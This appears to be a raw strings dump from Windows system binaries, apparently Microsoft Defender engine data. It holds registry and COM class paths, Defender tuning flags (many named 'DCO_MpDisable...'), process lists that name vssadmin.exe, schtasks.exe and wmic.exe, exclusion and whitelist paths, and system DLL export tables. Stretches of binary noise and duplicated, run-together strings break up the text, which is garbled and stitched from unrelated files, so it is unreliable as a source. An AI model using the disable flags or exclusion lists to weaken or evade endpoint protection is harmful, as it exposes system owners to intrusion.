ez>OK \\{00000109-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\Interface\\{0000010e-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\Interface\\{0000010f-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\Interface\\{00000113-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\Interface\\{00000114-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\Interface\\{00000115-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\Interface\\{00000116-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\Interface\\{00000117-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\Interface\\{00000118-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\Interface\\{00000119-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\Interface\\{0000011a-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\Interface\\{0000011b-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\Interface\\{0000011c-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\Interface\\{0000011e-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\Interface\\{00000122-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\Interface\\{00000139-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\Interface\\{0000013c-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\Interface\\{00000266-0000-0010-8000-00aa006d2ea4} BSOFTWARE\\Classes\\allfilesystemobjects\\shellex\\contextmenuhandlers BSOFTWARE\\Classes\\interface\\{00000138-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\interface\\{00000139-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\interface\\{0000013b-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\interface\\{00000140-0000-0000-c000-000000000046} BSOFTWARE\\classes\\Interface\\{00000128-0000-0000-c000-000000000046} BSYSTEM\\CurrentControlSet\\Control\\ContentIndex\\Language\\English_UK BSoftware\\Microsoft\\internet explorer\\advancedoptions\\browse\\ftpui Bsoftware\\Microsoft\\internet explorer\\advancedoptions\\http\\genable Briefcase FriendlyTypeNameT@%SystemRoot%\\system32\\SHELL32.dll,-22978 catfile\\shell\\open\\command Rrundll32.exe cryptext.dll,CryptExtOpenCA crlfile\\shell\\open\\command Rrundll32.exe cryptext.dll,CryptExtOpenCR p7sfile\\shell\\open\\command Rrundll32.exe cryptext.dll,CryptExtOpenPK batfile\\shell\\print\\command P%SystemRoot%\\System32\\NOTEPAD.EXE /p %1 diskmanagement.uitasks\\clsid N{7086AD76-44BD-11D0-81ED-00A0C90FC491} -CLSID\\{56FDF344-FD6D-11d0-958A-006097C9A090} .Task Bar Communication -CLSID\\{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} .Shell DocObject Viewer -clsid\\{0a9ae910-85c0-11d0-bd42-00a0c911ce86} .AVI mux Property Page1 -clsid\\{3050f5be-98b5-11cf-bb82-00aa00bdce0b} .DownloadBehavior Class -clsid\\{550dda30-0541-11d2-9ca9-0060b0ec3d39} .XML Data Source Object -clsid\\{5db2625a-54df-11d0-b6c4-0800091aa605} .ICM Monitor Management -clsid\\{C4D2D8E0-D1DD-11CE-940F-008029004347} .System Monitor Control -clsid\\{FD853CE1-7F86-11d0-8252-00C04FD85AB4} .CLSID_IMimePropertySet -clsid\\{e436ebb8-524f-11ce-9f53-0020af0ba770} .Filter Graph no thread 1interface\\{00000136-0000-0000-c000-000000000046} &ISCMLocalActivator 1interface\\{6eb22872-8a19-11d0-81b6-00a0c9231c29} &ICatalogCollection 1interface\\{9B16ED16-D3DF-11D1-8B08-00600806D9B6} &ISWbemQualifierSet 1interface\\{A1FAF330-EF97-11CE-9BC9-00AA00608E01} &IOleParentUndoUnit 4CLSID\\{00000541-0000-0010-8000-00AA006D2EA4}\\ProgID ADODB.Error.2.8 4CLSID\\{b54f3742-5b07-11cf-a4b0-00aa004a55e8}\\progid VBScript Author 4clsid\\{66182ec4-afd1-11d2-9cb9-0000f87a369e}\\progid WinNTSystemInfo 4clsid\\{f935dc22-1cf0-11d0-adb9-00c04fd58a0b}\\progid WScript.Shell.1 9interface\\{000C1090-0000-0000-C000-000000000046}\\typelib <CLSID\\{3050F3D6-98B5-11CF-BB82-00AA00BDCE0B}\\InProcServer32 IImgCtx <software\\microsoft\\windows\\currentversion\\policies\\explorer noclose /system\\currentcontrolset\\services\\npfs\\aliases ntsvcs eventlogsvcctl 3.5.21022.08 2SOFTWARE\\Blizzard Entertainment\\World of Warcraft c:\\wow 2software\\microsoft\\windows\\currentversion\\runonce wextract_cleanup0 SAVAGE32.EXE Increment 4927 7SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\Base 7SYSTEM\\CurrentControlSet\\control\\safeboot\\minimal\\base 8SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate SusClientId ;system\\currentcontrolset\\control\\systemresources\\busvalues \tinternal =SOFTWARE\\Microsoft\\DirectDraw\\Compatibility\\NortonSystemInfo CSYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Hashes CSYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory Management Csoftware\\Microsoft\\internet explorer\\advancedoptions\\crypto\\ssl3.0 Csoftware\\Microsoft\\internet explorer\\embedextntoclsidmappings\\.dcr Csystem\\currentcontrolset\\services\\lanmanserver\\autotunedparameters protocols\\handler\\mailto clsidN{3050f3DA-98B5-11CF-BB82-00AA00BDCE0B} giffilter.cogiffilter.1\\clsid N{607fd4e8-0a03-11d1-ab1d-00c04fc9b304} ias.mschaperrorreporter\\clsid N{6BC09897-0CE6-11D1-BAAE-00C04FC2E20D} icofilter.coicofilter.1\\clsid microsoft.xmlparser.1.0\\clsid N{D2423620-51A0-11D2-9CAF-0060B0EC3D39} pngfilter.copngfilter.1\\clsid N{A3CCEDF7-2DE2-11D0-86F4-00A0C913F750} *FilePlaybackTerminal.FilePlaybackTerminal 6FilePlaybackTerminal Class -CLSID\\{ecabafc4-7f19-11d2-978e-0000f8757e2a} 0Queued Component Player -clsid\\{7007acc5-3202-11d1-aad2-00805fc1270e} 0LAN Connection UI Class -clsid\\{cd000009-8b95-11d1-82db-00c04fb1625d} 0NNTPPostConnector Class 1interface\\{0000013a-0000-0000-c000-000000000046} (IPropertySetStorage 1interface\\{00020021-0000-0000-c000-000000000046} (AVIStream Interface 1interface\\{3050f55e-98b5-11cf-bb82-00aa00bdce0b} (DispHTMLWindowProxy 1interface\\{3050f560-98b5-11cf-bb82-00aa00bdce0b} (DispHTMLHtmlElement 1interface\\{3050f561-98b5-11cf-bb82-00aa00bdce0b} (DispHTMLHeadElement 1interface\\{bb1a2ae3-a4f9-11cf-8f20-00805f2cd064} (IActiveScriptEncode 1interface\\{e0e270c0-c0be-11d0-8fe4-00a0c90a6341} (OLEDBSimpleProvider 4CLSID\\{8856F961-340A-11D0-A96B-00C04FD705A2}\\ProgID \"Shell.Explorer.2 4clsid\\{6bc096b8-0ce6-11d1-baae-00c04fc2e20d}\\progid \"IAS.Accounting.1 4clsid\\{bc94d813-4d7f-11d2-a8c9-00aa00a71dca}\\progid \"IAS.SdoService.1 4clsid\\{eab22ac3-30c1-11cf-a7eb-0000c05bae0b}\\progid \"Shell.Explorer.1 4clsid\\{ff151822-b0bf-11d1-a80d-000000000000}\\progid \"MSDAURL.Binder.1 9clsid\\{0cd7a5c0-9f37-11ce-ae65-08002b2e1262}\\shellfolder attributes 9clsid\\{2227a280-3aea-1069-a2de-08002b30309d}\\shellfolder 9clsid\\{7bd29e00-76c1-11cf-9dd0-00a0c9034933}\\shellfolder <CLSID\\{E2510970-F137-11ce-8B67-00AA00A3F1A6}\\InprocServer32 qcap.dll DCLSID\\{00C429C0-0BA9-11d2-A484-00C04F8EFB69}\\Implemented Categories DCLSID\\{06290BD8-48AA-11D2-8432-006008C3FBFC}\\Implemented Categories DCLSID\\{06290BD9-48AA-11D2-8432-006008C3FBFC}\\Implemented Categories DCLSID\\{06290BDB-48AA-11D2-8432-006008C3FBFC}\\Implemented Categories Dclsid\\{424b71af-0695-11d2-a484-00c04f8efb69}\\implemented categories Dclsid\\{5220cb21-c88d-11cf-b347-00aa00a28331}\\implemented categories Dclsid\\{555278e2-05db-11d1-883a-3c8b00c10000}\\implemented categories DevicePath\"%SystemRoot%\\inf +SYSTEM\\ControlSet001\\services\\NetBIOS\\Enum 02Root\\LEGACY_NETBIOS\\0000 wdmaud.drv :SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System <system\\currentcontrolset\\services\\dhcp\\parameters\\options\\3 keytype >SOFTWARE\\Classes\\appid\\{27af75ed :STPK VTZipSfx. VTZipSfx6 VTZipSfx: VTZipSfxG \\VLNPK VTZipSfxkY VTZipSfxw =SWPK VTZipSfx| MpUseAms IOAVParams JSEmu:MaxGC MpSSLOptions MpMaxScanDepth IsuCategory FilterTimeoutLocal MpBHOMaxSizeCached MpUIHistorySize DCO_MpDisableBmProxy FilterTimeoutNetwork ContainerScannedCount HtmlParsingCountLimit MOACEnabledVersion DCO_MpBmScavengerDelay MpBmDirMonitoringFlags MpMaxSpynetFileSize MpMaxStaticFileSize MpWsTrimTimeInterval DCO_MpDisableGlobalASOC BMExclusions DCO_MpBmIdleScavengeTime \tVFSParams [\"\tVFSParams DetectedFriendlyLimit DCO_MpBmDisableFolderEnum DCO_MpMaxRtsdBatchSize MinScriptNormalization DCO_MpDisableHardlinkCheck MpEnableMapsLatencyRetries DCO_MpMapsHeartbeatRate DCO_MpDisableDynamicAnomaly DCO_MpSyncDssQueryTimeout DCO_MpDisableAmsiSessionCache DCO_MpDisableCopyAcceleration DCO_MpDisableWmiConfiguration DCO_MpSuppressVolumeOpenFlush DCO_MpBmTerminatedScavengeTime MpMaxContainerFriendlyCheck MpUseSha1OnlyForWatsonBucketing DCO_MpBmDisableTaintingProcesses [) DCO_MpBmDisableTaintingProcesses DCO_MpDisableSystemRegistryCache [) DCO_MpDisableSystemRegistryCache MpRbMAutomaticEngineRollbackMode [) MpRbMAutomaticEngineRollbackMode !DCO_MpDisableKslNameRandomization [*!DCO_MpDisableKslNameRandomization !DCO_MpSqlitePersistentWalDisabled [*!DCO_MpSqlitePersistentWalDisabled \"DCO_MpDisableOpenFileNotifications [+\"DCO_MpDisableOpenFileNotifications #DCO_MpBmAdditionalTDTScavengerDelay [,#DCO_MpBmAdditionalTDTScavengerDelay #DCO_MpDisableValidateTrustOfficeVba '\t[,#DCO_MpDisableValidateTrustOfficeVba $DCO_MpDisableDynamicAnomalyTelemtery [-$DCO_MpDisableDynamicAnomalyTelemtery %DCO_MpDisableDynamicAnomalyCollection [.%DCO_MpDisableDynamicAnomalyCollection &DCO_MpEnableUefiEnumerationInHeartBeat [/&DCO_MpEnableUefiEnumerationInHeartBeat 'MpRbMPlatformServiceCrashToleranceCount [0'MpRbMPlatformServiceCrashToleranceCount $DCO_MpExpensiveSignatureThresholdLua [1$DCO_MpExpensiveSignatureThresholdLua (DCO_MpOnlyCfaDllFriendlySlowCheckAllDirs [1(DCO_MpOnlyCfaDllFriendlySlowCheckAllDirs )DCO_MpFC_Block_IRM_CloudEgress_NativeHost [2)DCO_MpFC_Block_IRM_CloudEgress_NativeHost &DCO_MpExpensiveSignatureThresholdRpfDt [3&DCO_MpExpensiveSignatureThresholdRpfDt 'DCO_MpExpensiveSignatureThresholdRpfEmu [4'DCO_MpExpensiveSignatureThresholdRpfEmu ,MpRbMPlatformMinimumDaysNeededToDetermineLKG [5,MpRbMPlatformMinimumDaysNeededToDetermineLKG +DCO_MpExpensiveSignatureThresholdIoBytesLua [8+DCO_MpExpensiveSignatureThresholdIoBytesLua 6DCO_MpMaintenanceWindowCleanFileTelemetrySelectionRate [?6DCO_MpMaintenanceWindowCleanFileTelemetrySelectionRate ExpensiveFileTimeouts28 AmsiProcessList^ wscript.exe[{ AsrThrottledAuditRules` OFNAllowIdenticalNamesj vssadmin.exe schtasks.exe\twmic.exe[ TPTrustedProcessesv %system%\\omadmclient.exe %system%\\deviceenroller.exe[ BmNoTaintInjection .mptest-{04b93336-5432-4199-b181-06ca5e416104} WmiPrvSE.exe[ BMHardenedProcesses %system%\\csrss.exe %system%\\lsass.exe %system%\\winlogon.exe[ BmNoTaintInjectionFullPath 1C:\\mptest-{93df4ce4-8346-4bf6-a515-0fda5a495c89} %system%\\wbem\\WmiPrvSE.exe[ NpSettings W{ \"volumeEventFrequency\" : 30, \"maxVolumeEvents\" : 10, \"volumeTelemetryTimeout\" : 60 }[ ArEMSProcNames \t\texplorer\tservices dllhost wuauclt[ BmProxyList csc.exe regsvr32.exe[ BmFileChangeOverwriteExclusions %ProgramFiles%\\%ProgramFiles(x86)%\\%windir%\\%appdata%\\%localappdata%\\%ProgramData%\\%public%\\[ NriExcludedProcesses %system%\\smartscreen.exe %system%\\wuauclt.exe %installlocation%\\msmpeng.exe %installlocation%\\mpcmdrun.exe[ NpAutoExclusions ntttcp.exe xbtplinksvc.exe iperf.exe iperf2.exe iperf3.exe[< InheritProcessModules\" %WINDIR%\\explorer.exe%WINDIR%\\system32\\rundll32.exe%WINDIR%\\SysWOW64\\rundll32.exe%WINDIR%\\system32\\wscript.exe%WINDIR%\\system32\\cscript.exe[O BmScriptList> python.exe\truby.exe powershell_ise.exe msxsl.exe\tperl.exe\tbash.exe\tpwsh.exe[v \tDT_paramsh CompetitiveSecurityProducts (r)\\\\[^\\\\]*mcafee[^\\\\]*\\\\ %system%\\mrt.exe (r)\\\\ascservice.exe$+(r)^.*\\\\bbcf618-2a81-426d-81ec-[^.]+\\.exe$7%programdata%\\a1a72074-2e3e-43e5-97bb-dddaae288b19.exe:%common_appdata%\\a1a72074-2e3e-43e5-97bb-dddaae288b19.exe[ ASEngineConfig .exe\".dll\".ocx\".vbs\".bat\".cmd\".com\".js\".msi\".reg\".shs\".sys\".vb\".vbe\".wsc\".wsf\".wsh\".scr\".asm\".zip\".ini\".pif\".lnk\".htm\".html\".doc\".xls\".ppt\".docx\".pptx\".xlsx\".dot\".xlt\".xml\".bin\".ax\".fon\".chm\".msp\".tlb\".aspx\".asp\".cpl\".drv\".msc\".api\".app\".apl\".aup[ AVEngineConfig .exe\".dll\".ocx\".vbs\".bat\".cmd\".com\".js\".msi\".reg\".shs\".sys\".vb\".vbe\".wsc\".wsf\".wsh\".scr\".asm\".zip\".ini\".pif\".lnk\".htm\".html\".doc\".xls\".ppt\".docx\".pptx\".xlsx\".dot\".xlt\".xml\".bin\".ax\".fon\".chm\".msp\".tlb\".aspx\".asp\".cpl\".drv\".msc\".api\".app\".apl\".aup[$ AsimovKillBitList Engine.BM.DetectionDrop Engine.BM.ShutdownFailure Engine.BM.CLFSFileOpen Engine.BM.DoubleParent Engine.BM.OctagonEventCount Engine.BM.EtwPendingShutdown Engine.BM.EtwShutdownComplete Engine.HIPS.FileRemoveFailure Engine.Maps.InvalidReportType[C ScanProcessModules, %WINDIR%\\explorer.exe%WINDIR%\\system32\\rundll32.exe%WINDIR%\\SysWOW64\\rundll32.exe%WINDIR%\\system32\\dllhost.exe%WINDIR%\\SysWOW64\\dllhost.exe%WINDIR%\\system32\\regsvr32.exe%WINDIR%\\system32\\svchost.exe%PROGRAMFILES%\\Internet Explorer\\iexplore.exe%WINDIR%\\system32\\mrt.exe[v MpRewScanningExclusionsZ cdrom.sys:0002000000000000 pci.sys:0002000000000000 HDAudBus.sys:0002000000000000 ACPI.sys:0002000000000000 ksthunk.sys:0002000000000000 UsbHub3.sys:0002000000000000 usbhub.sys:0002000000000000 ntoskrnl.exe:8000000000000000 hal.dll:8000000000000000 i8042prt.sys:4000000000000000[ 1BmFileChangeOverwriteExtensionInclusionSortedListL .docb .dotm .dotx .ppsx .sldm .sldx .xlam .xlsb .xltm .xltx .xps[ RegistryWhiteList (3,1),%system%\\csrss.exe (3),%system%\\lsass.exe (3),%system%\\services.exe (1),%system%\\msiexec.exe (2),%system%\\poqexec.exe&(1),%system%\\Register-CimProvider.exe (3),%system%\\mrt.exeL(2),%program_files%\\Windows Defender Advanced Threat Protection\\mssense.exeb(2),%common_appdata%\\Microsoft\\Windows Defender Advanced Threat Protection\\Platform\\*\\MsSense.exe (2),%system%\\sysprep.exe!(2),%system%\\Sysprep\\sysprep.exeH(3),%program_files%\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exeF(3),*\\Monitoring\\Agent\\Extensions\\AzureSecurityPack\\WDATPLauncher.exe[ SFCExtensions .exe\".dll\".ocx\".vbs\".bat\".cmd\".com\".js\".msi\".reg\".shs\".sys\".vb\".vbe\".wsc\".wsf\".wsh\".scr\".asm\".zip\".ini\".pif\".lnk\".htm\".html\".doc\".xls\".ppt\".docx\".pptx\".xlsx\".dot\".xlt\".xml\".bin\".ax\".fon\".chm\".msp\".tlb\".aspx\".asp\".cpl\".drv\".msc\".api\".app\".apl\".aup\".manifest\".mui\".gpd\".inf\".cat\".png\".ppd\".wav\".man\".ttf\".mum\".mof\".ps1\".cur\".xrm-ms\".adml\".admx\".gpd\".nls\".h1s\".jpg\".mfl\".exp\".dat\".imd\".resx\".bmp\".config\".ptxml\".dxt\".rtf\".wmv\".xsd\".psd1\".tbl\".gif\".icm\".sql\".gdl\".icc\".icc\".bcm\".browser\".vdf\".regtrans-ms\".ppd\".cmb\".rom\".cfg\".diagpkg\".ps1xml\".theme\".ascx\".css\".nlp\".txt\".ico\".targets\".nls\".icm\".ttc\".default\".cat[ CfaExemptProcessesByScenario (1)|\\OneDrive.exe (1)|%windir%\\Explorer.exe (1)|\\DismHost.exe (1)|\\Dism.exe (1)|\\TiWorker.exe0(1)|%program_files%\\Mozilla Firefox\\firefox.exe9(1)|%program_files%\\Google\\Chrome\\Application\\Chrome.exe (1)|%windir%\\browser_broker.exe (1)|\\Blend.exe (1)|\\devenv.exe)(1)|\\Microsoft.VisualStudio.Web.Host.exe (1)|\\QTAgent32_40.exe (1)|\\WcfTestClient.exe (1)|\\XDesProc.exe (1)|\\vstest.discoveryengine.exe$(1)|\\vstest.discoveryengine.x86.exe (1)|\\vsgraphics.exe (1)|\\git.exe (1)|\\node.exe (1)|\\msvsmon.exe (1)|\\FxCopCmd.exe (1)|\\cl.exe (1)|\\link.exe (1)|\\vcredist_arm.exe (1)|\\vcredist_x64.exe (1)|\\vcredist_x86.exe (1)|\\vcpkgsrv.exe (1)|\\CreatePkgDef.exe (1)|\\VcxprojReader.exe (1)|\\cmake.exe (1)|\\vs_installer.windows.exe (1)|\\vs_installerservice.exe!(1)|\\vs_installerservice.x86.exe (1)|\\vs_installershell.exe (1)|\\MSBuild.exe (1)|\\MSBuildTaskHost.exe (1)|\\7z.exe (1)|\\csc.exe (1)|\\VBCSCompiler.exe (1)|\\rc.exe0(1)|\\ServiceHub.RoslynCodeAnalysisService32.exe!(1)|\\ServiceHub.SettingsHost.exe!(1)|\\ServiceHub.IdentityHost.exe!(1)|\\ServiceHub.Host.CLR.x64.exe!(1)|\\ServiceHub.Host.CLR.x86.exe (1)|\\ServiceHub.Host.CLR.exe#(1)|\\Servic 5DqqsK ZFFZ. jv op 2LM9p /g2LM9p Ma.# P 234fu f1Ht<L SLZmGp f^wD.g o]1|p8 X_krs u@JAH yUW~U g.RXa g0\\w g2zO# <T|H'yZ gG3~Km UcY230 gd,:m <!N p hB^C[p =N\t`} v,%9p <x K[ JjE'@p T$J&p \tcYMz &of[_p QVWKp hS o5C hUdFE 05 9p pe|:o >'@$Z iR[\t_ ^:|?? E^A7g ;;I&pVs=e 6coNp `D|hg f=ex\\J j\tj >WB L~!rC )W\\7? a=C%p jiqb3 BOl\t|j ,YR~hp o9g xB9 *)0Ep l L]y4 |2Ni&6 $ .text% `.rsrc0 RSDSb usp10.pdb usp10.pdbj USP10.DLL LpkPresent ScriptApplyDigitSubstitution ScriptApplyLogicalWidth ScriptBreak ScriptCPtoX ScriptCacheGetHeight ScriptFreeCache ScriptGetCMap ScriptGetFontProperties ScriptGetGlyphABCWidth ScriptGetLogicalWidths ScriptGetProperties ScriptIsComplex ScriptItemize ScriptJustify ScriptLayout ScriptPlace ScriptRecordDigitSubstitution ScriptShape ScriptStringAnalyse ScriptStringCPtoX ScriptStringFree ScriptStringGetLogicalWidths ScriptStringGetOrder ScriptStringOut ScriptStringValidate ScriptStringXtoCP ScriptString_pLogAttr ScriptString_pSize ScriptString_pcOutChars ScriptTextOut ScriptXtoCP UspAllocCache UspAllocTemp UspFreeMem !\"USP10.DLLLpkPresentScriptApplyDigitSubstitutionScriptApplyLogicalWidthScriptBreakScriptCPtoXScriptCacheGetHeightScriptFreeCacheScriptGetCMapScriptGetFontPropertiesScriptGetGlyphABCWidthScriptGetLogicalWidthsScriptGetPropertiesScriptIsComplexScriptItemizeScriptJustifyScriptLayoutScriptPlaceScriptRecordDigitSubstitutionScriptShapeScriptStringAnalyseScriptStringCPtoXScriptStringFreeScriptStringGetLogicalWidthsScriptStringGetOrderScriptStringOutScriptStringValidateScriptStringXtoCPScriptString_pLogAttrScriptString_pSizeScriptString_pcOutCharsScriptTextOutScriptXtoCPUspAllocCacheUspAllocTempUspFreeMem CompanyNameMicrosoft Corporationn# FileDescriptionUniscribe Unicode script processor InternalNameUniscribe OriginalFilenameUniscribej% $ @@.reloc\\0 RSDSp rasdlg.pdb ExitProcessKERNEL32.dllOd.a RASDLG.DLL DwTerminalDlg GetRasDialOutProtocols RasAutodialDisableDlgA RasAutodialDisableDlgW RasAutodialQueryDlgA RasAutodialQueryDlgW RasDialDlgA RasDialDlgW RasEntryDlgA RasEntryDlgW RasMonitorDlgA RasMonitorDlgW RasPhonebookDlgA RasPhonebookDlgW RasSrvAddPropPages RasSrvAddWizPages RasSrvAllowConnectionsConfig RasSrvCleanupService RasSrvEnumConnections RasSrvHangupConnection RasSrvInitializeService RasSrvIsConnectionConnected RasSrvIsServiceRunning RasSrvQueryShowIcon RasUserEnableManualDial RasUserGetManualDial RasUserPrefsDlg RasWizCreateNewEntry RasWizGetNCCFlags RasWizGetSuggestedEntryName RasWizGetUserInputConnectionName RasWizIsEntryRenamable RasWizQueryMaxPageCount RasWizSetEntryName RouterEntryDlgA RouterEntryDlgW !\"#RASDLG.DLLDwTerminalDlgGetRasDialOutProtocolsRasAutodialDisableDlgARasAutodialDisableDlgWRasAutodialQueryDlgARasAutodialQueryDlgWRasDialDlgARasDialDlgWRasEntryDlgARasEntryDlgWRasMonitorDlgARasMonitorDlgWRasPhonebookDlgARasPhonebookDlgWRasSrvAddPropPagesRasSrvAddWizPagesRasSrvAllowConnectionsConfigRasSrvCleanupServiceRasSrvEnumConnectionsRasSrvHangupConnectionRasSrvInitializeServiceRasSrvIsConnectionConnectedRasSrvIsServiceRunningRasSrvQueryShowIconRasUserEnableManualDialRasUserGetManualDialRasUserPrefsDlgRasWizCreateNewEntryRasWizGetNCCFlagsRasWizGetSuggestedEntryNameRasWizGetUserInputConnectionNameRasWizIsEntryRenamableRasWizQueryMaxPageCountRasWizSetEntryNameRouterEntryDlgARouterEntryDlgW FileDescriptionWindows raschap Library InternalNamerasdlg OriginalFilenamerasdlgj% 1$1-161?1H1Q1Z1c1l1u1~1 $ $*e .text1 @@Ge.a Bd.a@ E ~ !T! \"E\"y\" \t!?!q! #$%&'()* +,-./0123456789:;< =>?@ABCDEF SECURITY.DLL AcquireCredentialsHandleW SECUR32.AcquireCredentialsHandleW AddCredentialsW SECUR32.AddCredentialsW CredMarshalTargetInfo SECUR32.CredMarshalTargetInfo CredUnmarshalTargetInfo SECUR32.CredUnmarshalTargetInfo GetSecurityUserInfo SECUR32.GetSecurityUserInfo InitializeSecurityContextW SECUR32.InitializeSecurityContextW QuerySecurityPackageInfoW SECUR32.QuerySecurityPackageInfoW SealMessage SECUR32.SealMessage SecCacheSspiPackages SECUR32.SecCacheSspiPackages SecDeleteUserModeContext SECUR32.SecDeleteUserModeContext SecGetLocaleSpecificEncryptionRules SECUR32.SecGetLocaleSpecificEncryptionRules SecInitUserModeContext SECUR32.SecInitUserModeContext SecpFreeMemory SECUR32.SecpFreeMemory SecpTranslateName SECUR32.SecpTranslateName SecpTranslateNameEx SECUR32.SecpTranslateNameEx UnsealMessage SECUR32.UnsealMessage AcceptSecurityContext SECUR32.AcceptSecurityContext AcquireCredentialsHandleA SECUR32.AcquireCredentialsHandleA AddCredentialsA SECUR32.AddCredentialsA AddSecurityPackageA SECUR32.AddSecurityPackageA AddSecurityPackageW SECUR32.AddSecurityPackageW ApplyControlToken SECUR32.ApplyControlToken CompleteAuthToken SECUR32.CompleteAuthToken DecryptMessage SECUR32.DecryptMessage DeleteSecurityContext SECUR32.DeleteSecurityContext DeleteSecurityPackageA SECUR32.DeleteSecurityPackageA DeleteSecurityPackageW SECUR32.DeleteSecurityPackageW EncryptMessage SECUR32.EncryptMessage EnumerateSecurityPackagesA SECUR32.EnumerateSecurityPackagesA EnumerateSecurityPackagesW SECUR32.EnumerateSecurityPackagesW ExportSecurityContext SECUR32.ExportSecurityContext FreeContextBuffer SECUR32.FreeContextBuffer FreeCredentialsHandle SECUR32.FreeCredentialsHandle GetComputerObjectNameA SECUR32.GetComputerObjectNameA GetComputerObjectNameW SECUR32.GetComputerObjectNameW GetUserNameExA SECUR32.GetUserNameExA GetUserNameExW SECUR32.GetUserNameExW ImpersonateSecurityContext SECUR32.ImpersonateSecurityContext ImportSecurityContextA SECUR32.ImportSecurityContextA ImportSecurityContextW SECUR32.ImportSecurityContextW InitSecurityInterfaceA SECUR32.InitSecurityInterfaceA InitSecurityInterfaceW SECUR32.InitSecurityInterfaceW InitializeSecurityContextA SECUR32.InitializeSecurityContextA LsaCallAuthenticationPackage SECUR32.LsaCallAuthenticationPackage LsaConnectUntrusted SECUR32.LsaConnectUntrusted LsaDeregisterLogonProcess SECUR32.LsaDeregisterLogonProcess LsaEnumerateLogonSessions SECUR32.LsaEnumerateLogonSessions LsaFreeReturnBuffer SECUR32.LsaFreeReturnBuffer LsaGetLogonSessionData SECUR32.LsaGetLogonSessionData LsaLogonUser SECUR32.LsaLogonUser LsaLookupAuthenticationPackage SECUR32.LsaLookupAuthenticationPackage LsaRegisterLogonProcess SECUR32.LsaRegisterLogonProcess LsaRegisterPolicyChangeNotification SECUR32.LsaRegisterPolicyChangeNotification LsaUnregisterPolicyChangeNotification SECUR32.LsaUnregisterPolicyChangeNotification MakeSignature SECUR32.MakeSignature QueryContextAttributesA SECUR32.QueryContextAttributesA QueryContextAttributesW SECUR32.QueryContextAttributesW QueryCredentialsAttributesA SECUR32.QueryCredentialsAttributesA QueryCredentialsAttributesW SECUR32.QueryCredentialsAttributesW QuerySecurityContextToken SECUR32.QuerySecurityContextToken QuerySecurityPackageInfoA SECUR32.QuerySecurityPackageInfoA RevertSecurityContext SECUR32.RevertSecurityContext SaslAcceptSecurityContext SECUR32.SaslAcceptSecurityContext SaslEnumerateProfilesA SECUR32.SaslEnumerateProfilesA SaslEnumerateProfilesW SECUR32.SaslEnumerateProfilesW SaslGetProfilePackageA SECUR32.SaslGetProfilePackageA SaslGetProfilePackageW SECUR32.SaslGetProfilePackageW SaslIdentifyPackageA SECUR32.SaslIdentifyPackageA SaslIdentifyPackageW SECUR32.SaslIdentifyPackageW SaslInitializeSecurityContextA SECUR32.SaslInitializeSecurityContextA SaslInitializeSecurityContextW SECUR32.SaslInitializeSecurityContextW SetContextAttributesA SECUR32.SetContextAttributesA SetContextAttributesW SECUR32.SetContextAttributesW TranslateNameA SECUR32.TranslateNameA TranslateNameW SECUR32.TranslateNameW VerifySignature SECUR32.VerifySignature KSECURITY.DLLAcquireCredentialsHandleWSECUR32.AcquireCredentialsHandleWAddCredentialsWSECUR32.AddCredentialsWCredMarshalTargetInfoSECUR32.CredMarshalTargetInfoCredUnmarshalTargetInfoSECUR32.CredUnmarshalTargetInfoGetSecurityUserInfoSECUR32.GetSecurityUserInfoInitializeSecurityContextWSECUR32.InitializeSecurityContextWQuerySecurityPackageInfoWSECUR32.QuerySecurityPackageInfoWSealMessageSECUR32.SealMessageSecCacheSspiPackagesSECUR32.SecCacheSspiPackagesSecDeleteUserModeContextSECUR32.SecDeleteUserModeContextSecGetLocaleSpecificEncryptionRulesSECUR32.SecGetLocaleSpecificEncryptionRulesSecInitUserModeContextSECUR32.SecInitUserModeContextSecpFreeMemorySECUR32.SecpFreeMemorySecpTranslateNameSECUR32.SecpTranslateNameSecpTranslateNameExSECUR32.SecpTranslateNameExUnsealMessageSECUR32.UnsealMessageAcceptSecurityContextSECUR32.AcceptSecurityContextAcquireCredentialsHandleASECUR32.AcquireCredentialsHandleAAddCredentialsASECUR32.AddCredentialsAAddSecurityPackageASECUR32.AddSecurityPackageAAddSecurityPackageWSECUR32.AddSecurityPackageWApplyControlTokenSECUR32.ApplyControlTokenCompleteAuthTokenSECUR32.CompleteAuthTokenDecryptMessageSECUR32.DecryptMessageDeleteSecurityContextSECUR32.DeleteSecurityContextDeleteSecurityPackageASECUR32.DeleteSecurityPackageADeleteSecurityPackageWSECUR32.DeleteSecurityPackageWEncryptMessageSECUR32.EncryptMessageEnumerateSecurityPackagesASECUR32.EnumerateSecurityPackagesAEnumerateSecurityPackagesWSECUR32.EnumerateSecurityPackagesWExportSecurityContextSECUR32.ExportSecurityContextFreeContextBufferSECUR32.FreeContextBufferFreeCredentialsHandleSECUR32.FreeCredentialsHandleGetComputerObjectNameASECUR32.GetComputerObjectNameAGetComputerObjectNameWSECUR32.GetComputerObjectNameWGetUserNameExASECUR32.GetUserNameExAGetUserNameExWSECUR32.GetUserNameExWImpersonateSecurityContextSECUR32.ImpersonateSecurityContextImportSecurityContextASECUR32.ImportSecurityContextAImportSecurityContextWSECUR32.ImportSecurityContextWInitSecurityInterfaceASECUR32.InitSecurityInterfaceAInitSecurityInterf